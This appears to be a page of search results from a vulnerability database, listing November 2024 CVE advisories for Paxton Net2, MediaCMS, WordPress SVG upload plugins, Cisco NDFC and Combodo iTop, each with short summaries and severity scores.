Lucene search
K

4966 matches found

CVE
CVE
added 2024/11/11 12:0 a.m.75 views

CVE-2024-48939

Paxton Net2 prior to version 6.07.14023.5015 (SR4) has insufficient validation of the REST API License file, which can allow using the REST API with an invalid license and may enable retrieval of access-log data. Confirmed in multiple sources (NVD, Red Hat, CNVD/CNNVD, PT Security) across CVE-202...

7.5CVSS6.5AI score0.007EPSS
Exploits0References4
Cvelist
Cvelist
added 2024/11/11 12:0 a.m.28 views

CVE-2024-48939

Insufficient validation performed on the REST API License file in Paxton Net2 before 6.07.14023.5015 SR4 enables use of the REST API with an invalid License File. Attackers may be able to retrieve access-log data...

0.007EPSS
Exploits0References3
Vulnrichment
Vulnrichment
added 2024/11/11 12:0 a.m.17 views

CVE-2024-48939

Insufficient validation performed on the REST API License file in Paxton Net2 before 6.07.14023.5015 SR4 enables use of the REST API with an invalid License File. Attackers may be able to retrieve access-log data...

7AI score0.007EPSS
Exploits0References3
CNNVD
CNNVD
added 2024/11/10 12:0 a.m.5 views

Paxton Access Net2 安全漏洞

Paxton Access Net2 is an application from Paxton Access that provides simple and flexible site management. A security vulnerability exists in Paxton Access Net2 versions prior to 6.07.14023.5015 SR4, which stems from insufficient validation of the REST API license file implementation, resulting i...

7.5CVSS6.6AI score0.007EPSS
Exploits0References2
NVD
NVD
added 2024/11/08 11:15 p.m.42 views

CVE-2024-52004

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that upon special cases can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

8.7CVSS0.00679EPSS
Exploits0References2
Cvelist
Cvelist
added 2024/11/08 10:10 p.m.40 views

CVE-2024-52004 Remote code execution vulnerabilities in MediaCMS

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that upon special cases can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

8.7CVSS0.00679EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2024/11/08 10:10 p.m.37 views

CVE-2024-52004 Remote code execution vulnerabilities in MediaCMS

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that upon special cases can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

8.7CVSS7.4AI score0.00679EPSS
Exploits0References2
CVE
CVE
added 2024/11/08 10:10 p.m.89 views

CVE-2024-52004

CVE-2024-52004 affects MediaCMS (Python/Django + React, REST API). Root cause: insufficient input validation during media upload, allowing remote code execution under specific conditions when the portal permits uploading content. Affected versions: all prior to 4.1.0; patched in 4.1.0. Practical ...

8.7CVSS7.4AI score0.00679EPSS
Exploits0References2
OSV
OSV
added 2024/11/08 10:10 p.m.19 views

CVE-2024-52004 Remote code execution vulnerabilities in MediaCMS

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that upon special cases can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

8.7CVSS8.1AI score0.00679EPSS
Exploits0References4
OSV
OSV
added 2024/11/08 12:15 p.m.6 views

CVE-2024-10325

The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

5.4CVSS5.9AI score0.00288EPSS
Exploits0References3
NVD
NVD
added 2024/11/08 12:15 p.m.24 views

CVE-2024-10325

The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

6.4CVSS0.00288EPSS
Exploits0References3
Cvelist
Cvelist
added 2024/11/08 6:39 a.m.19 views

CVE-2024-10269 Easy SVG Support <= 3.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

The Easy SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access a...

6.4CVSS0.00288EPSS
Exploits0References3
OSV
OSV
added 2024/11/06 5:15 p.m.3 views

CVE-2024-20536

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller NDFC could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

8.8CVSS6.1AI score0.00772EPSS
Exploits0References1
NVD
NVD
added 2024/11/06 5:15 p.m.16 views

CVE-2024-20536

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller NDFC could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

8.8CVSS0.00772EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2024/11/06 4:31 p.m.10 views

CVE-2024-20536 Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller NDFC could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

8.8CVSS8.4AI score0.00772EPSS
Exploits0References1
Cvelist
Cvelist
added 2024/11/06 4:31 p.m.22 views

CVE-2024-20536 Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller NDFC could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

8.8CVSS0.00772EPSS
Exploits0References1
GithubExploit
GithubExploit
added 2024/11/06 4:25 p.m.88 views

Exploit for Authentication Bypass Using an Alternate Path or Channel in Vivektamrakar Wp_Rest_Api_Fns

CVE-2024-49328 WP REST API FNS = 1.0.0 - Privilege Escalat...

9.8CVSS9.8AI score0.01461EPSS
Exploits2
Cisco
Cisco
added 2024/11/06 4:0 p.m.19 views

Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller NDFC could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

8.8CVSS9.1AI score0.00772EPSS
Exploits0References1
Cvelist
Cvelist
added 2024/11/05 6:11 p.m.17 views

CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop

Combodo iTop is a simple, web based IT Service Management tool. Unauthenticated user can perform users enumeration, which can make it easier to bruteforce a valid account. As a fix the sentence displayed after resetting password no longer shows if the user exists or not. This fix is included in...

7.5CVSS0.01259EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2024/11/05 6:11 p.m.15 views

CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop

Combodo iTop is a simple, web based IT Service Management tool. Unauthenticated user can perform users enumeration, which can make it easier to bruteforce a valid account. As a fix the sentence displayed after resetting password no longer shows if the user exists or not. This fix is included in...

7.5CVSS7.6AI score0.01259EPSS
Exploits0References1
Rows per page
Query Builder